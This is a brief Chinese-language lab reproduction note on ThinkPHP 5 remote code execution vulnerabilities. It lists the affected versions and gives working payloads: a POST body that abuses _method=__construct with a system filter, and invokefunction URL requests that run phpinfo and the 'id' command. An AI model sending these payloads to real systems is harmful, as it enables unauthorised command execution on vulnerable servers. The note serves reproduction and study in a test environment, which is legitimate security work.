ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞介绍
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
影响范围
ThinkPHP 5.0系列 < 5.0.23
漏洞复现
靶场搭建后,访问地址
F12进入HackBar中
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
漏洞复现
通过phpinfo函数写出phpinfo()的信息
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
查看id
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id